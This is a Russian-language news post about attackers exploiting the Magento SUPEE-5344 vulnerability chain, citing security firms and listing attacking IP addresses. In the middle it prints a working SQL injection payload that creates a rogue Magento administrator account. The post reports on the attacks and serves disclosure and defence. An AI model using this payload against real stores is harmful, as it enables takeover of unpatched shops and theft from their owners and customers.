Злоумышленники уже начали эксплуатировать исключительно опасную уязвимость SUPEE-5344, которая присутствует почти в 100 000 интернет-магазинах, работающих на системе управления контентом Magento.

Magento считается самой популярной CMS для интернет-магазинов. Разработчики выпустили патч ещё в феврале, но до сих пор большое количество торговых площадок не установили его, как это часто бывает. Многие владельцы магазинов просто не знают, что подвергают опасности и себя, и своих пользователей.

О проблеме рассказал голландский хостер Byte, который размещает много сайтов на платформе Magento. Они уже наблюдали использование эксплоита для Magento версий Community и Enterprise.

Информацию подтверждают коллеги из Sucuri. Они говорят, что обнаруженный ими эксплоит осуществляет только одну функцию: создаёт фальшивый админский аккаунт в базе данных Magento.

popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);

SET @SALT = “rp”;

SET @PASS = CONCAT(MD5(CONCAT( @SALT , ‘123’) ), CONCAT(‘:’, @SALT ));
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;

INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES (‘Firstname’,’Lastname’,”email@example.com”,’ypwq‘,@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());

INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,’U’,(SELECT user_id FROM admin_user WHERE username = ‘ypwq’),’Firstname’); –

«Уязвимость на самом деле состоит из цепочки нескольких уязвимостей, которые в итоге позволяют неавторизованному пользователю запустить PHP-код на сервере», — объясняет Нетанель Рубин (Netanel Rubin) из компании Check Point. В частности, используются уязвимости CVE-2015-1397, CVE-2015-1398 и CVE-2015-1399. На сопровождающем видео специалисты Check Point показывают, как заказать дорогие наручные часы, используя SUPEE-5344.

По информации Incapsula, атаки начались в понедельник с IP-адресов 62.76.177.179 и 185.22.232.218 (оба российские).



2 комментария

  1. 25.04.2015 at 13:12

    Купить товар не авторизовываясь, какой страшный эксплоит

  2. 29.05.2015 at 03:55

    выполнить любой пхп скрипт на сервере. довольно страшный эксплойт.

Оставить мнение